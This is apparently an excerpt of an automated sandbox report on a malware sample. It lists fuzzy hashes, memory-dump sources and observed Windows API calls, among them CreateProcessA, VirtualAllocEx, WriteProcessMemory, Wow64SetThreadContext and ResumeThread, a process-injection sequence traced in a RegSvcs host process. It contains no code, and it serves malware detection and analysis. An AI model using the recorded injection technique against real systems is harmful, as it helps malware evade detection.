                                                • Opcode Fuzzy Hash: 0a4eda22b59a86ffc8d567b38e6ac02fb2e92a828828938ec640df52437635bf
                                                • Instruction Fuzzy Hash: B4F0C439B40118CFCB14DB68D5A8A6D7BB2FF88715F2541A9E5069B3A0DB35AD02CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 51e4e3b8031093ffa39b1aa99193ebe344ea0fcb61a9a8a38e7935a091d36aaf
                                                • Instruction ID: 700fbd383249436189b60c7490dfdd5e00fa1256c364dd55e5ef29dacf973b12
                                                • Opcode Fuzzy Hash: 51e4e3b8031093ffa39b1aa99193ebe344ea0fcb61a9a8a38e7935a091d36aaf
                                                • Instruction Fuzzy Hash: 66F03130910209EFDB45FFB4F850A9D77BAFB44340F1096B8C405AB250EB796F449B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:8.9%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:194
                                                Total number of Limit Nodes:3

                                                Control-flow Graph

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0714F9D6
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: cdd51c0839c76eada510a99168c56b34c3459418b85ca9d1be1e27edfa67d3fc
                                                • Instruction ID: 5b0e64c4fca14b2e3e9e02841e07e10b7f095ab9482e518dc7061a7c86c2997a
                                                • Opcode Fuzzy Hash: cdd51c0839c76eada510a99168c56b34c3459418b85ca9d1be1e27edfa67d3fc
                                                • Instruction Fuzzy Hash: 90A15CB1D0061ADFEB21DF69C8417DDBBB6BF48310F18856AD808A7380DB749986CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0714F9D6
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: e9c52ba617b414c0a0ae33c35f32bc20b0a7ce6f14ba7e9d6128c17503bf90a5
                                                • Instruction ID: a8aa84ce8a9705af38696ddffbf48c6bc29b16a23a7144ebb46e15b60be3ccee
                                                • Opcode Fuzzy Hash: e9c52ba617b414c0a0ae33c35f32bc20b0a7ce6f14ba7e9d6128c17503bf90a5
                                                • Instruction Fuzzy Hash: 51914CB1D0061ADFEB21DF69C8417DDBBB6BF48314F18856AD808A7380DB749986CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 029DAF3E
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 9e6251db0d1df946b999e8b8c0b9e3fdef98c3b13e9d4ebb9c060486abede7a7
                                                • Instruction ID: 39a6d17e2cc42000c082c697fc6aa18b8e13c65980eeec38a93cc68f2bf45263
                                                • Opcode Fuzzy Hash: 9e6251db0d1df946b999e8b8c0b9e3fdef98c3b13e9d4ebb9c060486abede7a7
                                                • Instruction Fuzzy Hash: 97714570A00B058FEB28DF29D44475ABBF5FF88204F008A2DD48ADBA50DB75E955CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05101A02
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1428014109.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_5100000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 928b723c0597705d3f58b27c9e59479c6d012468a8210875e238ce5c3ac291ff
                                                • Instruction ID: 22bd51f758b700ef724d38e823e89b5ce9ed8dafd407317f5c66de6ad2f6acf7
                                                • Opcode Fuzzy Hash: 928b723c0597705d3f58b27c9e59479c6d012468a8210875e238ce5c3ac291ff
                                                • Instruction Fuzzy Hash: D451C1B1D00358EFDB14CF99C984ADEBBB5FF48310F24852AE819AB250D7B49945CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05101A02
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1428014109.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_5100000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: f7394e917a91584d0fef591d3fc54b393a3cde8e5c1390322a099a81dd8c2df0
                                                • Instruction ID: e993e09e85c7610876315c28d93bb53d0c3fc46c7430c6c58b168ddaa6755bfe
                                                • Opcode Fuzzy Hash: f7394e917a91584d0fef591d3fc54b393a3cde8e5c1390322a099a81dd8c2df0
                                                • Instruction Fuzzy Hash: 5041C1B1D00358EFDB14CF99C984ADEBBB5FF88310F24852AE819AB250D7B49945CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 029D59A9
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 57b229598f9e2126805b717b79080cd0a000b427ec1a3cbaff3bae67026f6b6b
                                                • Instruction ID: 7d1188b61fe226b9c5b7eba629051ba1898c27792e53bd5df386cfe75d0bce91
                                                • Opcode Fuzzy Hash: 57b229598f9e2126805b717b79080cd0a000b427ec1a3cbaff3bae67026f6b6b
                                                • Instruction Fuzzy Hash: 5541C370C0071DCFEB24DFA9C884B9EBBB5BF48304F60805AD409AB251DB75694ACF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 029D59A9
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: ae41faa3a1c2f4c0b43e8205f5b8881a209daadbcbc4f4abe3643eac019f10ef
                                                • Instruction ID: 2ce58122336a99e4181cdb26901beb3991dc9deb6c366755fb5148e3f0aa81dd
                                                • Opcode Fuzzy Hash: ae41faa3a1c2f4c0b43e8205f5b8881a209daadbcbc4f4abe3643eac019f10ef
                                                • Instruction Fuzzy Hash: F641D1B0C00719CBEB24CFA9C984B9EBBB5BF48304F60805AD409AB255D775694ACF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05104111
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1428014109.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_5100000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 4b6d67c49dfd940f817da6b3cf7d7d0949529d1fa52f1db36f5ae051bdf9cc95
                                                • Instruction ID: c812f2e491f89c933a18a7139908175418ecf424eac4bba8dd1acfa02bf79513
                                                • Opcode Fuzzy Hash: 4b6d67c49dfd940f817da6b3cf7d7d0949529d1fa52f1db36f5ae051bdf9cc95
                                                • Instruction Fuzzy Hash: DC41F9B5900305CFDB14CF95C889AAABBF6FB88314F24C459D519AB361D7B5A841CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0714F1A8
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: ddc23ac07d12b79197d3fd414b1cc4b2d23aa605bbf95e6c64faffa020f55be2
                                                • Instruction ID: 75f881052f5a0551d50ffd80ba48e7aa6e96fc52ff1f3e62e7d43b048bcf6f34
                                                • Opcode Fuzzy Hash: ddc23ac07d12b79197d3fd414b1cc4b2d23aa605bbf95e6c64faffa020f55be2
                                                • Instruction Fuzzy Hash: 472139B1D003499FDB10CFAAC9847DEBBF5FF48320F14852AE958A7280D7799945CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0714F288
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 2c969d4dc7f6ac25816aa978c69cafa71c5e28c5a55ddabc413b8e78a00c2aaa
                                                • Instruction ID: 38a3d02c96616a38faea649ad550858ade22e55908b969185e25e637d8c5db7f
                                                • Opcode Fuzzy Hash: 2c969d4dc7f6ac25816aa978c69cafa71c5e28c5a55ddabc413b8e78a00c2aaa
                                                • Instruction Fuzzy Hash: 292128B1D003499FDB10DFAAC844ADEBBF5FF48310F14842AE558A7240D7789541CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0714F1A8
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 19a21ccb86f238cc550f0c3055bfb67747be183a52dde7755d01a74faab8328e
                                                • Instruction ID: 9fc622c28a75c994b88e6315ba85a35e60f255a523db740d1e7d36f70dd4035d
                                                • Opcode Fuzzy Hash: 19a21ccb86f238cc550f0c3055bfb67747be183a52dde7755d01a74faab8328e
                                                • Instruction Fuzzy Hash: 462124B19003599FDB10CFAAC985BDEBBF5FF48310F14882AE918A7340D7789945CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0714EFFE
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: e0d109067d1aae382e16dbec31f61f484d21b00767f55c691e08bb6a1fd9b1c5
                                                • Instruction ID: 076532ad641774e7e2ea75c928d58185e64ac0cca5e34891035fdd4f71e102b8
                                                • Opcode Fuzzy Hash: e0d109067d1aae382e16dbec31f61f484d21b00767f55c691e08bb6a1fd9b1c5
                                                • Instruction Fuzzy Hash: 4B2159B1D003098FDB20CFAAC4857EEBBF5EF48214F14842AD459A7340CB799946CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,029DD586,?,?,?,?,?), ref: 029DD647
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: f7ed053fdf456be80a3e100b6c891a8ae1d2725cc515c8dc166beb2cf7618446
                                                • Instruction ID: ea8bd7bb4953f3fd4493ba3077ddd0ae0dfd01a64e4ab32e9408b945ab42ef07
                                                • Opcode Fuzzy Hash: f7ed053fdf456be80a3e100b6c891a8ae1d2725cc515c8dc166beb2cf7618446
                                                • Instruction Fuzzy Hash: 9B21E4B59003489FDB10CF9AD584ADEBBF8EB48310F14841AE918A7350D378A941CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0714F288
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 4de7fd69415342b21d8a954a3cf4a79d7cf5e38804dccae2007529801ae5f344
                                                • Instruction ID: e2ea7078a7ae76c4016abfe2d44b972bf7292500dc3b056bcfb5648c2770533b
                                                • Opcode Fuzzy Hash: 4de7fd69415342b21d8a954a3cf4a79d7cf5e38804dccae2007529801ae5f344
                                                • Instruction Fuzzy Hash: BA2116B1D003599FDB10CFAAC884BDEBBF5FF48310F148429E918A7240D7789941CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0714EFFE
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 04bd8d1c7895176cf35803759123b315c851525c3195ba8fd3fd6140a86bcb9d
                                                • Instruction ID: fe2f0417f3fee7f1b33ab017ef1ebea239540bf7d857639fa7f2453aba2c4903
                                                • Opcode Fuzzy Hash: 04bd8d1c7895176cf35803759123b315c851525c3195ba8fd3fd6140a86bcb9d
                                                • Instruction Fuzzy Hash: 682138B1D003098FDB20CFAAC4857EEBBF5EF88224F148429D419A7340DB789946CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,029DD586,?,?,?,?,?), ref: 029DD647
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 0b133f207c6c2e40db13ffc0720686fca5cf11c2ab871c89853d712686fdfe3d
                                                • Instruction ID: fff46cacf44ecffdebc26fc2cd73606031fc832e80550b34ba0172339d54974b
                                                • Opcode Fuzzy Hash: 0b133f207c6c2e40db13ffc0720686fca5cf11c2ab871c89853d712686fdfe3d
                                                • Instruction Fuzzy Hash: 5121F3B5D003489FDB10CFAAD584ADEBBF5FB48310F14841AE918A7350D378A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0714F0C6
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: e35646b7bf27a3f0ed4a2167473775be07313526fe0b982ab456df2fe62177b8
                                                • Instruction ID: a31f19d97edee645cba0b5455fa8c2919fdd5dd7520cf926044129ad1f680813
                                                • Opcode Fuzzy Hash: e35646b7bf27a3f0ed4a2167473775be07313526fe0b982ab456df2fe62177b8
                                                • Instruction Fuzzy Hash: C61129719003499FDB20DFAAC845BDEBFF5EF88320F14881AE555A7250C779A941CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,029DAFB9,00000800,00000000,00000000), ref: 029DB1CA
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 0732a84a1271a42dc48d236dccd559aefa8f13aaa41bef82283b8376a8058f2f
                                                • Instruction ID: f11d8f0f5ee748eb31ded4057e659523d43a5768b8ebf0562b0a444a935f10f2
                                                • Opcode Fuzzy Hash: 0732a84a1271a42dc48d236dccd559aefa8f13aaa41bef82283b8376a8058f2f
                                                • Instruction Fuzzy Hash: 7E1106B59003098FDB10CF9AC444BDEFBF4EB88214F10841AE519A7200C775A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0714F0C6
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 3dd1052a6b3538b56840cb2764fa9ea859ca6b78338445465a3d0536cbe8dfc9
                                                • Instruction ID: 9f7c529c000074ca07b14247d63727e82f165f3bb59f85f55e5b2846bb940921
                                                • Opcode Fuzzy Hash: 3dd1052a6b3538b56840cb2764fa9ea859ca6b78338445465a3d0536cbe8dfc9
                                                • Instruction Fuzzy Hash: 481137719003499FDB20DFAAC844BDEBBF5EF88320F148819E519A7250CB79A941CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 3a49ceee8407b1b173c58cb323b8a79d498c4a53c7b1ac773efc8ead94a85f9b
                                                • Instruction ID: fb8e94cdaef0914010384eb39649542067b4556896327d6336d2c2692da53878
                                                • Opcode Fuzzy Hash: 3a49ceee8407b1b173c58cb323b8a79d498c4a53c7b1ac773efc8ead94a85f9b
                                                • Instruction Fuzzy Hash: C31128B1D003588FDB20DFAAC4457DEFBF5EF88224F24885AD459A7240CB79A945CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,029DAFB9,00000800,00000000,00000000), ref: 029DB1CA
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: ecb1294375983d9fa0cbbfc8d5144c798815a9836cfd7a2fdaf398f541b834e2
                                                • Instruction ID: 2f57f9f63aaecdb8a38c2ebea06f4635d9a40aec3782f80e4c1aac8bfef0137f
                                                • Opcode Fuzzy Hash: ecb1294375983d9fa0cbbfc8d5144c798815a9836cfd7a2fdaf398f541b834e2
                                                • Instruction Fuzzy Hash: 3411E2B6D003098FDB20CF9AC945BDEFBF4EB88314F15842AD419A7200C779A546CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: c3195f39279d67d830d81a46ff5061a1678d8c9ebd503f45df5edf90a6bb2fd5
                                                • Instruction ID: 3b8e5403e7fe6b98ac27b739a6d20445018224e54d74ff011f6dad8f820edc13
                                                • Opcode Fuzzy Hash: c3195f39279d67d830d81a46ff5061a1678d8c9ebd503f45df5edf90a6bb2fd5
                                                • Instruction Fuzzy Hash: 341125B1D003588FDB20DFAAC4457DEFBF5EF88220F248819D419A7240CB79A945CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 029DAF3E
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: cd31a2f5c2fdfcc02bd99ca9f40e9097bfa3d8435bbb19766073a158d87f4833
                                                • Instruction ID: 3e07c14f76340af205ddc4b0a8c005a4bb2cdd0dc3deab0494a2221bbccaeed5
                                                • Opcode Fuzzy Hash: cd31a2f5c2fdfcc02bd99ca9f40e9097bfa3d8435bbb19766073a158d87f4833
                                                • Instruction Fuzzy Hash: A411D2B6D003498FDB20CF9AD444BDEFBF5EB88214F10846AD419A7210D379A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 029DAF3E
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: d5c84cd70fedbc402cedf82b0b7306199e170e57a44d56de11b70bfdb2e8811d
                                                • Instruction ID: b5bb098c1b1d4c5c1331b786ed14906f858be701952eb448da205fdda7819102
                                                • Opcode Fuzzy Hash: d5c84cd70fedbc402cedf82b0b7306199e170e57a44d56de11b70bfdb2e8811d
                                                • Instruction Fuzzy Hash: 6211F0B6C002498FDB10CF9AD544BDEFBF5EF48214F14C46AD419A7210D378A546CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414471125.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_114d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 45307c72cff5a4aa90a9a9ff2c3e77d0ce28f6b979f461ebbe76824826288d58
                                                • Instruction ID: a1fd1ea96cba31d675b992e8699a43cf1a9a9decc1ce7a5b7fbd71c6c955d170
                                                • Opcode Fuzzy Hash: 45307c72cff5a4aa90a9a9ff2c3e77d0ce28f6b979f461ebbe76824826288d58
                                                • Instruction Fuzzy Hash: DC2136B1500204DFDF09DF54E9C0B56BB65FBA8724F28C169E8090B656C33AE456CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414471125.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_114d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c0d0b9142f29a757a88560701e74a7eb9726e6f58349c7fb045ad94b561dc15a
                                                • Instruction ID: ea73218741be5437e8496fac10e95ce2971e82b5c548f6cd92074f17676c8394
                                                • Opcode Fuzzy Hash: c0d0b9142f29a757a88560701e74a7eb9726e6f58349c7fb045ad94b561dc15a
                                                • Instruction Fuzzy Hash: D8212171600240DFDF09DF54E8C0B26BF71FB98618F24C1A9E8090F256C736D456CAA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414551843.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_115d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a14aff68fa6392bfac1c72d6575ddea44e16aa15b6b353412bc80d34b66d5dc0
                                                • Instruction ID: 501e8315ffa3494312ca5743e2c48299f7d46d92f30a3675c49cb99500ebb236
                                                • Opcode Fuzzy Hash: a14aff68fa6392bfac1c72d6575ddea44e16aa15b6b353412bc80d34b66d5dc0
                                                • Instruction Fuzzy Hash: 8421D071504304EFDF49DF94E9C0B26BBA5FB88264F20C5ADEC194B252C37AD846CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414551843.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_115d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 00c3ae6e05087e65e128a9da7bca2f09edb9093d7e4ef001bab54f2601626549
                                                • Instruction ID: fe20b9efb7cb6f891fd09dc4cbf17be02a5cc269a020764a7d1962958e9b97b7
                                                • Opcode Fuzzy Hash: 00c3ae6e05087e65e128a9da7bca2f09edb9093d7e4ef001bab54f2601626549
                                                • Instruction Fuzzy Hash: 17210071604300DFDF59DF54E8C0B16BB61EB88254F20C5A9DC1A4B252C33AD847CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414551843.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_115d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
